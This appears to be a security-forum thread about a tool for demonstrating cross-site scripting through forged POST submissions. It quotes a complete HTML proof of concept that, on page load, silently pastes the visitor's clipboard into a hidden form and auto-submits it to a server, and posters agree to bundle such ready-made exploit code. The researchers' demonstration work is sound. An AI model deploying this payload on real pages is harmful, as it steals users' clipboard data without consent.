Well... it took me a while but how about this:
http://www.whiteacid.org/misc/xss_post_forwarder.php
code is at: http://www.whiteacid.org/misc/xss_post_forwarder.phps

It can't handle radio buttons, and as you can see from the classes I'd made the classes support any input type but I hadn't bothered creating the way for users to supply what they want the user type to be. Still... is that what you meant?

Edit: yes, I realise that the referer on the target server will be mine, I don't really care.

I've edited the script a bit. Should make more sense. After I actually used it to show a real XSS I found usability bugs. It now expects the target url in the xss_target variable, allows empty fields and is less cluttered.

I find it very useful, keep it up. but if I could make one suggestion it would be to include a textarea with the exploit code in it (including the automatic click event) so people don't have to code that part for themselves. Here's the HTML from http://ha.ckers.org/cutandpaste.html as an example:

<body onload="cutandpaste();">
<form method=post name=f action="cutandpaste.cgi">
<input type="submit" class="button" name="s" style="width=1px;height=1px">
<textarea maxlength=10000 name=clipb style="width=1px;height=1px"></textarea>
</form>
This only works in Internet Explorer. If you are using Firefox, or if you don't have anything in your clipboard this will be a pretty boring demo.
<script>
function cutandpaste() {
document.f.clipb.createTextRange().execCommand("Paste");
document.f.s.click();
}
</script>
</body>

The "document.f.s.click();" part is the part that's particularly interesting here.

Good suggestion. While it could be seen as encouraging exploitation as opposed to showing PoCs anyone who did want to exploit a flaw shows in the script will already know how to do it anyway so there's no extra harm in adding the textarea.
I've done it anway. Also I've extended the width of the input fields, which was really bugging me.